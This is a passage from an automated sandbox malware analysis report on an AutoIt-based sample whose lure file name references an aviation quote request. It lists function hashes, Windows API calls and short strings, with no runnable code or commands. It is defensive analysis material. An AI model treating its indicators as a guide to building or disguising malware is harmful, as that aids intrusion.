                                                                                                                                    • Opcode ID: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                                                                                    • Instruction ID: 680de140a9d5f22817ae5418eaecc8fe528ad8f9609c45874f50fc2ad59530bf
                                                                                                                                    • Opcode Fuzzy Hash: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                                                                                    • Instruction Fuzzy Hash: 6FE04F36A112129BD7306EB05D4CB563BBCEF557E1F248858F285CA044DA2E84469750
                                                                                                                                    APIs
                                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00FFB4BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContainedObject
                                                                                                                                    • String ID: AutoIt3GUI$Container
                                                                                                                                    • API String ID: 3565006973-3941886329
                                                                                                                                    • Opcode ID: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
                                                                                                                                    • Instruction ID: 27cc84fe38aef31bdf757144812c91dca1a95bdfbec2b467d41d07a0cb0df6ce
                                                                                                                                    • Opcode Fuzzy Hash: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
                                                                                                                                    • Instruction Fuzzy Hash: 20916975600605AFDB54DF64C884B6ABBF9FF48710F24846DFA4ACB2A1DB70E841DB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • __wcsnicmp.LIBCMT ref: 0100B02D
                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0100B0F6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                    • String ID: LPT
                                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                                    • Opcode ID: 1a375e7b3fb353e27f196aea7d2ef2af7ee4f2ba53ad103eb694e1d240b8e2ee
                                                                                                                                    • Instruction ID: 60ebc61668cd9e8464e3d90118c2d80181de915fa012f7a0d1025b200c1b9663
                                                                                                                                    • Opcode Fuzzy Hash: 1a375e7b3fb353e27f196aea7d2ef2af7ee4f2ba53ad103eb694e1d240b8e2ee
                                                                                                                                    • Instruction Fuzzy Hash: 9361B279A00219AFDB15DF98C891EEEB7F4EF09310F4440A9F956AB291DB74AE40CB50
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00FB2968
                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FB2981
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                    • Opcode ID: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
                                                                                                                                    • Instruction ID: c7486becd3cddd189587034ea2304d3334b4d16b760bd03825a020b1c3ba0e1c
                                                                                                                                    • Opcode Fuzzy Hash: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
                                                                                                                                    • Instruction Fuzzy Hash: 53516CB1408744ABE320EF50DC85BAFB7E8FF86344F81885DF2D841095DBB98929DB56
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4F0B: __fread_nolock.LIBCMT ref: 00FA4F29
                                                                                                                                    • _wcscmp.LIBCMT ref: 01009824
                                                                                                                                    • _wcscmp.LIBCMT ref: 01009837
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                                    • String ID: FILE
                                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                                    • Opcode ID: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
                                                                                                                                    • Instruction ID: 469c8a53b0b2569999169cc8a9c9fd6ead3833444196e26bc3e9f5ada9eea702
                                                                                                                                    • Opcode Fuzzy Hash: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
                                                                                                                                    • Instruction Fuzzy Hash: AF41D971A0020ABAEF219BA4CC45FEFBBFDDFC5714F004469F944A7181DAB5AA049B61
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0101259E
                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010125D4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CrackInternet_memset
                                                                                                                                    • String ID: |
                                                                                                                                    • API String ID: 1413715105-2343686810
                                                                                                                                    • Opcode ID: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
                                                                                                                                    • Instruction ID: 1c92e561d99f61328909c6c3822aab330e192ffc5e314307787479650630e1e2
                                                                                                                                    • Opcode Fuzzy Hash: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
                                                                                                                                    • Instruction Fuzzy Hash: DA3146B1800209EBCF01EFA5CC85EEEBFB8FF09340F100059F915A6166EB395A56DB60
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 01027B61
                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01027B76
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: '
                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                    • Opcode ID: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
                                                                                                                                    • Instruction ID: 40f1170545f142ddace434d851e3fbc2c0b8abd5ce745f0516df758a17f186c7
                                                                                                                                    • Opcode Fuzzy Hash: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
                                                                                                                                    • Instruction Fuzzy Hash: 25413B74A0121A9FDB54CFA8C880BDABBF5FF48310F1001AAEA44AB341D731A951CF90
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 01026B17
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01026B53
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                    • Opcode ID: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
                                                                                                                                    • Instruction ID: 6158dc4b38ea7c7f36cb294698072d9f99e5537802d4bf84fe837ea5f9da1b2b
                                                                                                                                    • Opcode Fuzzy Hash: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
                                                                                                                                    • Instruction Fuzzy Hash: A6319E71200214AEEB119F69CC80BFB77F9FF49760F108619F9E997190DA36AC91DB60
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002911
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0100294C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                    • Opcode ID: b45c281a670a5c9c2fe4a8657754adefeed60c5c27bab6765a3da1b1da786af0
                                                                                                                                    • Instruction ID: f6f6bbd1eda1ec4ff7f0d2dd513dbd7ea86fdaa43870dbb687a65a3eb649b1bf
                                                                                                                                    • Opcode Fuzzy Hash: b45c281a670a5c9c2fe4a8657754adefeed60c5c27bab6765a3da1b1da786af0
                                                                                                                                    • Instruction Fuzzy Hash: 3C3191316003069BFB66CE9CCD89BAEBFF8EF45390F140099EAC5A61E1DB709544CB52
                                                                                                                                    APIs
                                                                                                                                    • __snwprintf.LIBCMT ref: 01013A66
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                    • API String ID: 3506404897-2584243854
                                                                                                                                    • Opcode ID: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                                                                                    • Instruction ID: 1efe95262c9f05985eac74e6ca866801c70ec09e0b884fd7692ccee9bd9f9f82
                                                                                                                                    • Opcode Fuzzy Hash: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                                                                                    • Instruction Fuzzy Hash: 3E21E471A00219AFCF10EF65CC82EAE7BB9BF45720F804459F945AF142DB38E941DB61
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01026761
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0102676C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: Combobox
                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                    • Opcode ID: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                                                                                    • Instruction ID: 42c2f03f13e41523d80608a7d3c5d037512773537a7ea9688c26c5e5dc9a3317
                                                                                                                                    • Opcode Fuzzy Hash: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                                                                                    • Instruction Fuzzy Hash: CA11E975200119AFEF618E18DC84EBB37AAFB49394F100125FD9497291E636DC5087A0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                                                                                      • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                                                                                      • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 01026C71
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 01026C8B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                    • Opcode ID: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                                                                                    • Instruction ID: ce7431ca93015295eaa23fa71ca943cfd34fdda80ce088d85b4fc12019afe58e
                                                                                                                                    • Opcode Fuzzy Hash: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                                                                                    • Instruction Fuzzy Hash: A9211472A1021AAFDB15DFA8C845AFA7BB8FB08354F104629FD95D3240D63AE8509B60
                                                                                                                                    APIs
                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 010269A2
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010269B1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                    • String ID: edit
                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                    • Opcode ID: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                                                                                    • Instruction ID: f8da35558eda9242706d2528760d09ee4ec7a930f3e988e33c0f018abfc7f227
                                                                                                                                    • Opcode Fuzzy Hash: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                                                                                    • Instruction Fuzzy Hash: FE116A71600229ABEB618E68DC44EEB3BADEB053B4F504754FEE1961D0CA36DC519BA0
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002A22
                                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01002A41
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                    • Opcode ID: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                                                                                    • Instruction ID: dfa69ec7a49176f8699b7b6a4f76543d38eb7739b913d96bd5f97141604c1fd1
                                                                                                                                    • Opcode Fuzzy Hash: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                                                                                    • Instruction Fuzzy Hash: FF11B932901124ABFF76DE5CDC48BAE77F8AB46390F044091E9D5E72D0DB70A945C791
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0101222C
                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01012255
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                    • String ID: <local>
                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                    • Opcode ID: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
                                                                                                                                    • Instruction ID: 30191efc4627eecfa95bbd29f593842300d289fb36375a9199dcc2aa46e9ea2a
                                                                                                                                    • Opcode Fuzzy Hash: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
                                                                                                                                    • Instruction Fuzzy Hash: 75110270501225FADB258F158C88EFFFFA8FF06291F20826AFA8486004E2785894C6F0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FF8E73
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                    • Opcode ID: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
